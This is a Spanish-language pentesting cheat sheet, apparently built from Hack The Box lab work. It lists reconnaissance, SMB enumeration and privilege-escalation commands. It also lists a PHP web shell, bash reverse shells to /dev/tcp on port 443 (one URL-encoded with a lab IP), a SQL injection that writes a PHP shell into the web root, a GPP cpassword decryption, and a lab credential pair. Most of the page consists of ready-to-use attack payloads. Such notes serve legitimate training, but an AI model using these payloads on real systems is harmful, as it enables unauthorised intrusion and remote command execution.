Comandos y recursos
En construcción 🛠
RECONOCIMIENTO Y ESCANEO
Nmap
nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv {IP} -oN escaneo.txt
whatweb
whatweb http://ejemplo.com/
wfuzz
wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://ejemplo.com/FUZZ
dirb
dirb http://ejemplo.com/
DETECTAR EQUIPOS CONECTADOS A MI RED CON NETDISCOVER
netdiscover -i eth0 -r 192.168.0.0/24
DETECTAR EQUIPOS CONECTADOS A MI RED CON ARP-SCAN
arp-scan -I {IFACE} --localnet
smbmap para listar recursos compartidos
smbmap -H 10.10.10.100
smbmap para listar directorios de recursos compartidos
smbmap -H 10.10.10.100 -r Replication
smbmap -H 10.10.10.100 -r Replication/active.htb
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies
smbmap para descargar archivos de recursos compartidos
smbmap -H 10.10.10.100 --download Replication/Groups/Groups.xml
crackmapexec para verificar información
crackmapexec smb 10.10.10.100
crackmapexec para verificar credenciales validas
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
crackmapexec para listar recursos compartidos y los permisos en los mismos con credenciales validas
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
EXPLOTACIÓN
Código PHP malicioso para ganar Reverse Shell
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
Obtención de reverse shell desde navegador
bash -c 'bash -i >& /dev/tcp/{IP}/443 0>&1'
Reverse shell desde navegador URL encodeado
(En mi caso, está URL-encodeado con mi IP que me asigna la VPN de Hack The Box, por el puerto 443)
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%32%2f%34%34%33%20%30%3e%26%31%27
Obtención de reverse shell desde una consola
bash -i >& /dev/tcp/{IP}/443 0>&1
Inyección SQL para listar bases de datos
' UNION SELECT database()-- -
Inyección SQL para crear archivo PHP malicioso para RCE
' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/revshell.php"-- -
netcat en escucha por el puerto 443
nc -nlvp 443
Configurar proxy de Burp Suite para Firefox
Vamos a abrir Burp Suite y nos vamos a ir a la pestaña de "Proxy":

Vamos a ir a la configuración del proxy de Burp, en la subpestaña de "Proxy settings":

Vemos que el proxy, esta configurado con la IP 127.0.0.1 por el puerto 8080, sabiendo esto, vamos a ir a Firefox en nuestro Kali, y nos vamos a ir a ajustes del navegador o settings:

En el cuadro de busqueda de opciones, vamos a buscar la palabra clave "network"

Vamos a abrir la configuración de red, con el boton "Settings"

Vamos a darla a "Manual proxy configuration" y lo configuraremos con la IP y puerto correspondiente del proxy de Burp, en este caso la IP 127.0.0.1 y el puerto 8080

Vamos a aceptar con el boton "Ok", este paso no necesariamente tiene por que ser así, podemos configurar el proxy de Burp con la extensión de Foxy Proxy
Abrimos Burp Suite de nuevo y nos ponemos en modo intercepción:

gpp-decrypt
gpp-decrypt
en Kali Linux se utiliza para descifrar contraseñas almacenadas en los archivos de configuración Groups.xml
que son generados por Microsoft Windows en el contexto de las Preferencias de Directiva de Grupo (Group Policy Preferences, GPP).
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Diccionarios
COMPARTIR ARCHIVOS A MAQUINA OBJETIVO
COMPARTIR ARCHIVOS POR SERVIDOR WEB DE PYTHON
sudo python3 -m http.server {puerto, ejemplo 80}
impacket-smbserver para pasar archivos desde SMB
impacket-smbserver {Nombre del recurso compartido} {Directorio a comportir} -smb2support
Ejemplo:
impacket-smbserver recurso $(pwd) -smb2support
Copiar o bajar archivos desde SMB de un recurso compartido en Windows
copy \\{IP VPN HTB}\{Nombre del recurso}\churrasco.exe {Nombre de salida del archivo}
ESCALADO DE PRIVILEGIOS
TRATAMIENTO DE LA TTY
Para crearnos una pseudo-consola donde no tengamos problemas con el teclado ejecutamos lo siguiente:
script /dev/null -c bash
control z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm
Busqueda de archivos SUID
find / -perm -u=s -type f 2>/dev/null
Permisos de un usuario Linux
sudo -l
Capabilities
getcap -r / 2>/dev/null
Permisos de un usuario Windows
whoami /priv
Última actualización